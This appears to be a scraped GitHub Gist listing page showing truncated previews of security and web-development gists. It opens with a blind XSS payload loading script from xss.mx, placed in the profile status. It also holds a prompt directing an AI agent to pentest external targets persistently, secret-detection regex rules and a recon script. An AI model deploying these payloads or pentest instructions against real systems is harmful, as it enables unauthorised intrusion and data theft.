💭
><script src=//xss.mx></script><X="

geeknik geeknik

@nullenc0de
nullenc0de / external_pentest.yaml
Created April 7, 2025 20:56
nerve run external.yaml --target "example.com"
agent: >
  You are an expert penetration tester tasked with performing an external penetration test on a specified target (e.g., IP address or domain). Your goal is to identify vulnerabilities, propose exploitation methods, and deliver actionable findings with proof-of-concept details in `PENTEST.md`.
  ## Instructions
  - Target external assets specified via {{ target }} (e.g., public IPs, domains).
  - Follow a systematic yet creative methodology: reconnaissance, scanning, exploitation, and post-exploitation.
  - Use available data (e.g., provided outputs, hypothetical scan results) or execute commands to gather more as needed.
  - Identify confirmed vulnerabilities or exploitable weaknesses with evidence (e.g., tool outputs, HTTP responses).
  - Avoid stopping at "nothing found"—if initial scans (e.g., port scans) yield no results, dig deeper with alternative tools, techniques, or assumptions.
  - Prioritize high-impact vulnerabilities (e.g., remote code execution, privilege escalation, data exposure, aut
@monteslu
monteslu / gpu.html
Created September 12, 2024 20:35
single page compute shader in webgpu much faster than CPU equivalent.
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WebGPU Compute Shader Example</title>
</head>
<body>
<h1>WebGPU Compute Shader Example</h1>
<p id="output"></p>
<script type="module">
@felipecaon
felipecaon / jsluice_rules.json
Last active December 21, 2024 09:13
jsluice rules
[
  {
    "name": "ADMIN_PASSWORD",
    "value": "(admin).+(secret|token|key|password).+"
  },
  {
    "name": "AWS API Gateway",
    "value": "[0-9a-z]+\\.execute-api\\.[0-9a-z._-]+\\.amazonaws\\.com"
  },
  {
@metasikander
metasikander / NIP-05_Simple_Guide.md
Last active March 16, 2025 03:50
A small minimal guide on setting up NIP-05 identifier on branle/nostr

This is a very basic guide, just to understand what's needed to set it up.
If you have any questions you can find me at https://nostr.com/8355095016fddbe31fcf1453b26f613553e9758cf2263e190eac8fd96a3d3de9

Prerequisite

Setup static file on server

Create a file that resolves to <domain>/.well-known/nostr.json, and fill it out like this (enter the name you want to use, and input your own public key; make sure it's the HEX key):

{
@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
# wget saves the template as api-linkfinder.yaml, so pass that path to nuclei
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 | nuclei -t ./api-linkfinder.yaml -o api.txt
# Split the extracted lists on commas and brackets, strip quotes, and de-duplicate
cat api.txt | grep url_params | cut -d ' ' -f 7 | tr , '\n' | tr ']' '\n' | tr '[' '\n' | tr -d '"' | tr -d "'" | sort -u > api_params.txt
cat api.txt | grep relative_links | cut -d ' ' -f 7 | tr , '\n' | tr ']' '\n' | tr '[' '\n' | tr -d '"' | tr -d "'" | sort -u > api_link_finder.txt
id: apk-recon
info:
  name: APK Recon
  author: nullenc0de
  severity: info
  tags: android,file
file:
  - extensions:
@ResistanceIsUseless
ResistanceIsUseless / ssrf-host.txt
Last active March 13, 2024 17:24
SSRF Payloads
@nckroy
nckroy / eran-hammer-oauth2-rant-20120726.md
Created January 21, 2021 00:15
OAuth 2.0 and the Road to Hell

(Scraped from the Internet Wayback Machine. Original content by Eran Hammer / hueniverse.com July 26, 2012)

OAuth 2.0 and the Road to Hell

They say the road to hell is paved with good intentions. Well, that’s OAuth 2.0.

Last month I reached the painful conclusion that I can no longer be associated with the OAuth 2.0 standard. I resigned my role as lead author and editor, withdrew my name from the specification, and left the working group. Removing my name from a document I have painstakingly labored over for three years and over two dozen drafts was not easy. Deciding to move on from an effort I have led for over five years was agonizing.

There wasn’t a single problem or incident I can point to in order to explain such an extreme move. This is a case of death by a thousand cuts, and as the work was winding down, I’ve found myself reflecting more and more on what we actually accomplished. At the end, I reached the conclusion that OAuth 2.0 is a bad

@lizthegrey
lizthegrey / attributes.rb
Last active March 27, 2025 02:16
Hardening SSH with 2fa
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'
@JoeyBurzynski
JoeyBurzynski / 55-bytes-of-css.md
Last active April 8, 2025 14:18
58 bytes of css to look great nearly everywhere

58 bytes of CSS to look great nearly everywhere

When making this website, I wanted a simple, reasonable way to make it look good on most displays. Not counting any minimization techniques, the following 58 bytes worked well for me:

main {
  max-width: 38rem;
  padding: 2rem;
  margin: auto;
}